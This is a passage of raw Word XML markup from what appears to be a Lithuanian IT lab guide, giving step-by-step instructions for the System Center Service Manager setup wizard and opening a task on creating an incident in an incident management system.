          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Naršyti</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>veskite vartotojo abonementą ar grupę, kuriai norite suteikti „Service Manager“ administravimo duomenis</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00491326" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kitas</w:t>
      </w:r>
      <w:r w:rsidR="003E7DFE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574A816" w14:textId="24DCCEE5" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Puslapyje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Konfigūruoti paslaugų valdytojo paslaugų paskyrą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Domeno paskyra</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>urody</w:t>
      </w:r>
      <w:r w:rsidR="003D0EE7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> paskyros vartotojo vardą, slaptažodį ir domeną</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Test Credentials</w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gavę pranešimą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Kredencialai buvo priimti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, spustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00491326" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kitas</w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20322DDA" w14:textId="64F61B80" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje</w:t>
      </w:r>
      <w:r w:rsidR="0EADA1FF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Konfigūruoti paslaugų tvarkytuvės darbo eigos paskyrą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> spustelėkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Domeno paskyra</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>urody</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> paskyros vartotojo vardą, slaptažodį ir domeną</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Test Credentials</w:t>
      </w:r>
      <w:r w:rsidR="002F7DF0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gavę pranešimą „Kredencialai buvo priimti“, spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="32DA4635" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="00491326" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kitas</w:t>
      </w:r>
      <w:r w:rsidR="32DA4635" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C703B17" w14:textId="382B12F2" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Puslapyje </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Diagnostikos ir naudojimo duomenys</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nurodykite, ar norite bendrinti „Service Manager“ diagnostikos ir naudojimo duomenis su „Microsoft“. Norėdami pasirinkti, spustelėkite „System Center Service Manager“ privatumo pareiškim</w:t>
      </w:r>
      <w:r w:rsidR="6E811872" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="00B34AF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5B366BD0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="00491326" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kitas</w:t>
      </w:r>
      <w:r w:rsidR="5B366BD0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BEDAB2" w14:textId="2E3E621F" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="004F279C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kad</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kompiuteris būtų saugus ir atnaujintas,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">uslapyje </w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Naudokite </w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„Microsoft Update“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">nurodykite, ar norite naudoti „Microsoft Update“, kad patikrintumėte, ar nėra „Service Manager“ naujinimų. Jei norite, kad „Windows Update“ tikrintų, ar nėra naujinimų, pasirinkite </w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pradėti automatinį naujinimą</w:t>
      </w:r>
      <w:r w:rsidR="086AFFC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Spustelėkite </w:t>
      </w:r>
      <w:r w:rsidR="19D822BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,,</w:t>
      </w:r>
      <w:r w:rsidR="00491326" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kitas</w:t>
      </w:r>
      <w:r w:rsidR="19D822BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630EAD9" w14:textId="456EEEE6" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje</w:t>
      </w:r>
      <w:r w:rsidR="00B34AF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Diegimo suvestinė s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="00B34AF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Diegti</w:t>
      </w:r>
      <w:r w:rsidR="00B34AF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB5BC0F" w14:textId="08E3CE40" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="086AFFC6" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Puslapyje Sąranka sėkmingai baigta rekomenduojame palikti pažymėtą</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Atidaryti šifravimo atsarginę kopiją</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Atkurti vedlį</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pustelėkite</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,Uždaryti</w:t>
      </w:r>
      <w:r w:rsidR="004847AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Norėdami gauti daugiau informacijos apie šifravimo rakto atsarginę kopiją, žr. Diegimo užbaigimas kuriant atsarginę šifravimo rakto kopiją.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B12EDF8" w14:textId="1BCA0FBE" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="591D127F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA27F81" w14:textId="77777777" w:rsidR="00713793" w:rsidRPr="005A5C28" w:rsidRDefault="00713793" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTI IR KONFIGŪRUOTI IS INCIDENTĄ INCIDENTŲ VALDYMO SISTEMOJE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C0AF18" w14:textId="2BF50DFC" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="004F279C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LAUKIAMI REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
